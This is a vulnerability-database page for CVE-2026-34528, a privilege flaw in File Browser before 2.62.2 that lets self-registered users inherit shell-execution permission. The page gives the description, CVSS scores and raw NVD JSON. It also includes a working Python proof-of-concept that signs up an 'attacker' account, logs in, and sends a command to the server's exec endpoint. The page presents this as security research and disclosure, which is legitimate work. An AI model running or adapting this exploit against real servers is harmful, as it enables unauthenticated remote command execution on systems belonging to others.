Security Vulnerability Report
中文
CVE-2026-34528 CVSS 8.1 HIGH

CVE-2026-34528

Published: 2026-04-01 21:17:01
Last Modified: 2026-04-06 20:41:20
Source: [email protected]

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser < 2.62.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "http://localhost:8080" signup_url = f"{target_host}/api/public/signup" login_url = f"{target_host}/api/login" exec_url = f"{target_host}/api/resources/exec" # Attacker credentials username = "attacker" password = "secure_password_123" # Step 1: Register a new user # The vulnerability triggers here: the new user inherits 'Execute' permission signup_payload = { "username": username, "password": password } try: response = requests.post(signup_url, json=signup_payload) if response.status_code == 200: print("[+] User registered successfully.") else: print("[-] Registration failed.") exit() except Exception as e: print(f"[-] Error during registration: {e}") exit() # Step 2: Login to get authentication token login_payload = { "username": username, "password": password } try: response = requests.post(login_url, json=login_payload) if response.status_code == 200: token = response.json().get('data') print(f"[+] Logged in. Token: {token}") else: print("[-] Login failed.") exit() except Exception as e: print(f"[-] Error during login: {e}") exit() # Step 3: Execute arbitrary command # Using the inherited permission to run commands (e.g., 'id' or 'whoami') headers = { "X-Auth": token, "Content-Type": "application/json" } # Command to execute (must be in the allowed commands list or via shell bypass if configured) command_payload = { "command": "whoami", "async": False } try: response = requests.post(exec_url, json=command_payload, headers=headers) if response.status_code == 200: print("[+] Command executed successfully.") print("[+] Output:", response.text) else: print(f"[-] Command execution failed. Status: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error during command execution: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34528", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:17:00.660", "lastModified": "2026-04-06T20:41:19.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.62.2", "matchCriteriaId": "A22210FE-83DA-49B9-A015-543942FE731F"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-x8jc-jvqm-pm3f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-x8jc-jvqm-pm3f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.